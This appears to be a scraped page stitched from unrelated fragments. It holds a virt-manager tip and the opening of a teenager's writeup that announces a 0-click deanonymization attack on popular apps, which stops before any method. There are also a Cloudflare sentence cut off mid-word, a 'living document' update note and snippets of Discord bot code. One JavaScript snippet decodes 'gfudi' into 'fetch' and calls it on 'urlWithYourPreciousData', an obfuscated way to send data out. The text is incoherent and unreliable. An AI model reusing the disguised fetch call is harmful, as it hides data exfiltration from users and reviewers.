In virt-manager, navigate to Memory and enable the option Enable shared memory.
hi, i'm daniel. i'm a 15-year-old high school junior. in my free time, i hack billion dollar companies and build cool stuff.
3 months ago, I discovered a unique 0-click deanonymization attack that allows an attacker to grab the location of any target within a 250 mile radius. With a vulnerable app installed on a target's phone (or as a background application on their laptop), an attacker can send a malicious payload and deanonymize you within seconds--and you wouldn't even know.
I'm publishing this writeup and research as a warning, especially for journalists, activists, and hackers, about this type of undetectable attack. Hundreds of applications are vulnerable, including some of the most popular apps in the world: Signal, Discord, Twitter/X, and others. Here's how it works:
By the numbers, Cloudflare is easily the most popular CDN on the market. It beats out competitors such as Sucuri, Amazon CloudFront, Akamai, and Fastly. In 2019, a major Cloudflare outage k
This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.
Update: I've disabled comments as of 2025-01-26 to avoid everyone having notifications for something a year on if someone wants to suggest a correction. Folks are free to email to suggest corrections still, of course.
| /* | |
| This file is now hosted here: | |
| https://github.com/victornpb/undiscord | |
| */ |
| const i = 'gfudi'; | |
| const k = s => s.split('').map(c => String.fromCharCode(c.charCodeAt() - 1)).join(''); | |
| self[k(i)](urlWithYourPreciousData); |
| @commands.guild_only() | |
| # Command cannot be used in private messages. | |
| @commands.dm_only() | |
| # Command can only be used in private messages. | |
| @commands.is_owner() | |
| # Command can only be used by the bot owner. | |
| @commands.is_nsfw() |
| import logging | |
| import discord | |
| from discord import app_commands | |
| from discord.ext import commands | |
| LOGGER: logging.Logger = logging.getLogger(__name__) | |